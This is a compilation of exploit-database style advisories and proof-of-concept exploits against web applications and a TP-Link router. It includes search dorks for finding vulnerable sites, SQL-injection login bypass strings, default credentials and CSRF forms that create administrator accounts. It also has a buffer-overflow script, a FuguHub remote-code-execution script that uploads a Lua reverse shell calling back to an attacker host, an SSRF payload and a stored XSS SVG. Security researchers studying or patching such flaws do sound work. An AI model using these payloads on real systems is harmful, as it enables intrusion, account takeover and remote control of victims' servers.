<pre><code>====================================================================================================================================<br />| # Title : ApPHP MicroCMS v1.0.1 Host header attack Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.apphp.com/php-microcms/ | <br />| # Dork : ApPHP MicroCMS © ApPHP Admin Login |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine<br /><br />[+] Vulnerability description :<br /><br /> An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways. <br /> Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). <br /> Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <br /> <link href="http://_SERVER['HOST']" (Joomla)<br /> ...and append secret keys and tokens to links containing it: <br /> <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others)<br /> ....and even directly import scripts from it: <br /> <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various)<br /> <br />[+] This vulnerability affects : /phpmicrocms/index.php. <br /><br /><br />[+] Attack details : <br /><br /> Host header evilhostK8kAwlbV.com was reflected inside a A tag (href attribute).<br /><br />[+] The impact of this vulnerability :<br /><br /> An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.<br /><br />[+] How to fix this vulnerability :<br /><br /> The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. Consult references for detailed information.<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Arlisistem 3.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.arlisistem.com/ | <br />| # Dork : © Powered by Arlisistem.com |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] use payload : /portada.php<br /><br />[+] use Login : UsEr & PAss: 'or''=' <br /><br />[+] Admin Panel : http://127.0.0.1/wwwrocfild.comve/adminpanel.php<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ArticleSetup Script cms V1.02 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://articlesynergy.com/ | <br />| # Dork : intext:"© 2011 - Article Setup" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code Update admin informations .<br /><br />[+] Go to the line 6.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /admin/adminsettings.php . <br /><br />[+] http://127.0.0.1/q7art/admin/adminsettings.php<br /><br />[+] save code as poc.html .<br /><br /><br /><h2>Update Your Admin Settings</h2><br /> <div class="block"><br /> <br /> <br /> <p style="padding-left: 15px; color: red;">Settings updated!</p><br /> <form style="padding-left: 15px;" name="submission" enctype="multipart/form-data" method="POST" action="http://127.0.0.1/articles3nichesiteorg/admin/adminsettings.php"><br /><br /> <b>Name:</b><br><br /> <input name="name" style="width: 250px;" value="Administrator" type="text"><br /> <br /> <b>Email:</b><br><br /> <input name="email" style="width: 250px;" value="indoushka4ever@gmail.com" type="text"><br /> <br /> <b>New Password:</b><br><br /> <p>(Leave the password fields blank to retain old password)</p><br /> <input name="pass1" style="width: 250px;" type="password"><br /><br /> <b>New Password (again):</b><br><br /> <input name="pass2" style="width: 250px;" type="password"><br /><br /> <br /> <div style="clear:both"></div><br /><br /><br /> <input name="update" id="update" type="hidden"><br /> <button type="submit" id="submitstyle" name="save" class="button_colour round_all"><img alt="Bended Arrow Right" src="http://articles3.nichesite.org/admin/images/icons/small/white/Bended Arrow Right.png" width="24" height="24"><span>Update Settings</span></button><br /><script data-ad-client="ca-pub-9756159400559709" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /></form><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Allhandsmarketing LMS v2.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.allhandsmarketing.com/ | <br />| # Dork : " Design by Allhandsmarketing." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] usr :admin & pass : admin1234-<br /><br />[+] http://w127.0.0.1/pannresidencecom/backend/ <====| Login<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow<br /># Date: 2023-06-30<br /># country: Iran<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : hardware<br /># Dork : /userRpm/WanDynamicIpV6CfgRpm<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-36355<br /><br />import requests<br /><br /># Replace the IP address with the router's IP<br />router_ip = '192.168.0.1'<br /><br /># Construct the URL with the vulnerable endpoint and parameter<br />url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='<br /><br /># Replace the payload with a crafted payload that triggers the buffer overflow<br />payload = 'A' * 5000 # Example payload, adjust the length as needed<br /><br /># Send the GET request with the crafted payload<br />response = requests.get(url + payload)<br /><br /># Check the response status code<br />if response.status_code == 200:<br /> print('Buffer overflow triggered successfully')<br />else:<br /> print('Buffer overflow not triggered')<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Anuranan SBAdmin v2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) | <br />| # Vendor : https://anuranangroup.com/ | <br />| # Dork : Created by: Anuranan Group |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user&pass= ' or 0=0 # <br /><br />[+] http://127.0.0.1/ipedexcellencecom/kontlo/index.php<br /><br />====Greetings to :=======================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : XEL cms© v1.1 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | <br />| # Vendor : https://cyberxel.com | <br />| # Dork : "contact at: +91-98144 06799, z91-161-2408274 email: info@cyberxel.com" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Admin Panel : /xelcms/<br /><br />[+] infected file : /xelcms/user/adduser.php<br /><br />[+] line 07 set your target.<br /><br />[+] save code as poc.html<br /><br /> <style><br />@import 'http://cyberxel.com/xelcms/styles/main.css';<br />#form1 table {<br /> font-size: 12px;<br />}<br /> </style><link href="http://cyberxel.com/xelcms/fckeditor/_samples/sample.css" rel="stylesheet" type="text/css" /><span class=td><img src="http://cyberxel.com/xelcms/dzimages/arrowpath.gif" />&nbsp;<a href="users.php" class=td>Users</a> <img src="http://cyberxel.com/xelcms//dzimages/arrowpath2.gif" />&nbsp;Add user</h2><br /> </span><br><br><form id="form1" name="form1" method="post" action="TARGET_SITE/xelcms/user/adduser.php"><br /> <table width="99%" border="0" cellpadding="2" cellspacing="2"><br /> <tr><br /> <td width="8%">Username:</td><br /> <td width="92%"><label><br /> <input name="username" type="text" id="username" style="font-size: 10px;width:300" /><br /> </label></td><br /> </tr><br /> <tr><br /> <td>Password:</td><br /> <td><label><br /> <input name="password" type="password" id="password" style="font-size: 10px;width:300" /><br /> </label></td><br /> </tr><br /> <tr><br /> <td>Confirm password:</td><br /> <td><label><br /> <input name="password2" type="password" id="password2" style="font-size: 10px;width:300" /><br /> </label></td><br /> </tr><br /> <tr><br /> <td>Type:</td><br /> <td><label><br /> <select name="type" id="type" style="font-size: 10px;width:300"><br /> <option value="" selected></option><br /> <option value="Administrator">Administrator</option><br /> <option value="User">User</option><br /> </select><br /> </label></td><br /> </tr><br /> <tr><br /> <td>&nbsp;</td><br /> <td><br /> <input type="submit" name="Submit" value="Create user" style="font-size: 10px;" /><br /> </td><br /> </tr><br /> </table><br /></form><br /><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: FuguHub 8.1 - Remote Code Execution<br /># Date: 6/24/2023<br /># Exploit Author: redfire359 <br /># Vendor Homepage: https://fuguhub.com/<br /># Software Link: https://fuguhub.com/download.lsp<br /># Version: 8.1<br /># Tested on: Ubuntu 22.04.1<br /># CVE : CVE-2023-24078 <br /><br />import requests<br />from bs4 import BeautifulSoup<br />import hashlib<br />from random import randint<br />from urllib3 import encode_multipart_formdata<br />from urllib3.exceptions import InsecureRequestWarning<br />import argparse<br />from colorama import Fore<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />#Options for user registration, if no user has been created yet <br />username = 'admin'<br />password = 'password'<br />email = 'admin@admin.com'<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)<br />parser.add_argument("-rp","--rport", help = "http port [Default 80]")<br />parser.add_argument("-l","--lhost", help = "Your IP", required = True)<br />parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)<br />args = parser.parse_args()<br /><br />LHOST = args.lhost<br />LPORT = args.lport<br />url = args.rhost<br />if args.rport != None:<br /> port = args.rport<br />else:<br /> port = 80<br /><br />def main():<br /> checkAccount()<br /><br />def checkAccount():<br /> print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")<br /> s = requests.Session()<br /> <br /> # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account<br /> r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") <br /> soup = BeautifulSoup(r.content, 'html.parser')<br /> search = soup.find('h1')<br /> <br /> if r.status_code == 404:<br /> print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTaget IP\n\tTarget Port")<br /> exit(0)<br /><br /> userExists = False<br /> userText = 'User database already saved'<br /> for i in search:<br /> if i.string == userText:<br /> userExists = True<br /> <br /> if userExists:<br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")<br /> login(r,s)<br /> else:<br /> print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")<br /> createUser(r,s)<br /> login(r,s)<br /><br />def createUser(r,s):<br /> data = { email : email , <br /> 'user' : username , <br /> 'password' : password , <br /> 'recoverpassword' : 'on' }<br /> r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)<br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!") <br /><br />def login(r,s):<br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")<br /><br /> data = {'ba_username' : username , 'ba_password' : password}<br /> r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz <br /><br /> #Veryify login <br /> login_Success_Title = 'Web-File-Server'<br /> soup = BeautifulSoup(r.content, 'html.parser')<br /> search = soup.find('title')<br /> <br /> for i in search:<br /> if i != login_Success_Title:<br /> print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")<br /> exit(0)<br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")<br /><br /> exploit(r,s)<br /><br />def exploit(r,s):<br /> #Find the file server, default is fs<br /> r = s.get(f"https://{url}:443/fs/cmsdocs/")<br /> <br /> code = r.status_code<br /><br /> if code == 404:<br /> print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")<br /> exit(0)<br /><br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")<br /> <br /> #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default <br /> shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'<br /><br /> <br /> file_content = f'''<br /> <h2> Check ur nc listener on the port you put in <h2><br /><br /> <?lsp if request:method() == "GET" then ?><br /> <?lsp <br /> {shell} <br /> ?><br /> <?lsp else ?><br /> Wrong request method, goodBye! <br /> <?lsp end ?><br /> '''<br /><br /> files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}<br /> r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)<br /> <br /> if r.text == 'ok' :<br /> print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")<br /> r = s.get(f"https://{url}:443/rev.lsp")<br /><br />if __name__=='__main__':<br /> try:<br /> main()<br /> except:<br /> print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")<br /> <br /><br /></code></pre>
<pre><code>#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection<br />#Application: PodcastGenerator<br />#Version: v3.2.9<br />#Bugs: Blind SSRF via XML Injection<br />#Technology: PHP<br />#Vendor URL: https://podcastgenerator.net/<br />#Software Link: https://github.com/PodcastGenerator/PodcastGenerator<br />#Date of found: 01-07-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)<br />2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'<br /><br />payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test<br /><br />By the way i used localhost.If you have domain, you can use domain.<br /><br />3.And upload episodes<br /><br />4. I am listening on port 3132 because I'm observating for incoming requests<br /><br />nc -lvp 3132<br /><br />5. And I receive request<br /><br />request:<br /><br />POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1<br />Host: localhost<br />Content-Length: 101563<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3<br />Connection: close<br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"<br />Content-Type: image/jpeg<br /><br />image content blaaahblahasdfjblaaah;sdfblaaahasdf<br />asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd<br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="title"<br /><br />test<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="shortdesc"<br /><br />test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="date"<br /><br />2023-07-01<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="time"<br /><br />17:02<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="episodecover"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="longdesc"<br /><br />test<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="episodenum"<br /><br />33<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="seasonnum"<br /><br />33<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="itunesKeywords"<br /><br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="explicit"<br /><br />no<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="authorname"<br /><br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="authoremail"<br /><br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="customtags"<br /><br /><br />------WebKitFormBoundarypRUTcUa48pmEcI6Q<br />Content-Disposition: form-data; name="token"<br /><br />vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz<br />------WebKitFormBoundarypRUTcUa48pmEcI6Q--<br /><br /><br /></code></pre>
<pre><code>Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS)<br />Application: prestashop<br />Version: 8.0.4<br />Bugs: Stored XSS<br />Technology: PHP<br />Vendor URL: https://prestashop.com/<br />Software Link: https://prestashop.com/prestashop-edition-basic/<br />Date of found: 30.06.2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux<br /><br /><br />2. Technical Details & POC<br />========================================<br />steps: <br /><br />1. Go to Catalog => Products <br />2. Select arbitary product <br />2. upload malicious svg file<br /><br />svg file content ===><br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br /><br />poc request:<br /><br />POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1<br />Host: localhost<br />Content-Length: 756<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ<br />Accept: application/json<br />Cache-Control: no-cache<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-platform: ""<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55<br />Connection: close<br /><br />------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ<br />Content-Disposition: form-data; name="path"<br /><br /><br />------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ<br />Content-Disposition: form-data; name="path_thumb"<br /><br /><br />------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ<br />Content-Disposition: form-data; name="file"; filename="malas.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /> <script type="text/javascript"><br /> alert(document.location);<br /> </script><br /></svg><br /><br />------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--<br /><br /><br /></code></pre>